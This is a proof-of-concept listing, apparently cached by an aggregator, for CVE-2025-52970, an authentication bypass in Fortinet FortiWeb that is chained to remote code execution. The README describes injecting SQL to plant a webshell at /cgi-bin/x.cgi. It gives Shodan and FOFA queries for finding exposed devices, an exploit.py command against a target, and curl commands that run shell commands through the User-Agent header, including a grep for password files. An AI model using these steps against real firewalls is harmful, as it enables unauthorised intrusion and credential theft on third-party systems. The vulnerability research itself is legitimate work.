CVE-2025-52970 PoC — Fortinet FortiWeb 安全漏洞

Source

https://github.com/Hex00-0x4/FortiWeb-CVE-2025-52970-Authentication-Bypass

Associated Vulnerability

Title:Fortinet FortiWeb 安全漏洞 (CVE-2025-52970)
Description:Fortinet FortiWeb是美国飞塔（Fortinet）公司的一款Web应用层防火墙，它能够阻断如跨站点脚本、SQL注入、Cookie中毒、schema中毒等攻击的威胁，保证Web应用程序的安全性并保护敏感的数据库内容。 Fortinet FortiWeb 7.6.3及之前版本、7.4.7及之前版本、7.2.10及之前版本和7.0.10及之前版本存在安全漏洞，该漏洞源于参数处理不当，可能导致权限提升。

Readme

# 🚨 FortiWeb Authentication Bypass → Remote Code Execution 

## 📌 Overview
This repository demonstrates an **authentication bypass in FortiWeb** that can be chained to achieve **Remote Code Execution (RCE)**.  
The exploit leverages a vulnerable endpoint to inject SQL payloads, upload a webshell, and execute commands through HTTP headers.

⚠️ **Disclaimer**:  
This project is for **educational and research purposes only**.  
Do **NOT** use against systems you don’t own or have explicit permission to test.
### Netlas FOFA and Shodan

<img width="1841" height="898" alt="Screenshot 2025-08-23 131226" src="https://github.com/user-attachments/assets/e7f0e430-1405-4548-8b9f-53d04bc37dc1" />

```bash
((FortiWeb)) AND port:("8443")

### FOFA
title="FortiWeb" && port="8443"

### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443
```

## 🔎 Vulnerability Details
- **CVE**: CVE-2025-52970  
- **Component**: FortiWeb Fabric API (`/api/fabric/device/status`)  
- **Impact**: Authentication Bypass → SQL Injection → Webshell Upload → RCE  
- **Vector**: Crafted `Authorization` header + SQL injection

- 
## 🧑‍💻 Exploit Workflow
1. Drop and create temporary SQL table.
2. Write webshell payload in chunks.
3. Export shell to `/cgi-bin/x.cgi`.
4. Upload helper Python script to trigger permissions.
5. Access webshell by sending commands via `User-Agent` header.

   ## ⚙️ Usage

### 1️⃣ Clone Repo
```bash
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/

```
<img width="1473" height="722" alt="Screenshot 2025-08-23 114753" src="https://github.com/user-attachments/assets/f95c022b-47dc-44ae-8fe5-e7f5694d3e97" />
<img width="1472" height="747" alt="Screenshot 2025-08-23 114915" src="https://github.com/user-attachments/assets/fad31eff-ecf5-41e6-872a-a9c22662db99" />

3️⃣ Interact with Webshell
```bash
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
```
<img width="1477" height="722" alt="Screenshot 2025-08-23 114521" src="https://github.com/user-attachments/assets/47cdf826-5891-4192-9f77-b23cd17477bd" />

File Snapshot


 [4.0K]  /data/pocs/f525c6c000f9d952a874f6bbe88028f24ab14d21
├── [5.1K]  Forti_Bang.py
├── [1.0K]  LICENSE
└── [2.4K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!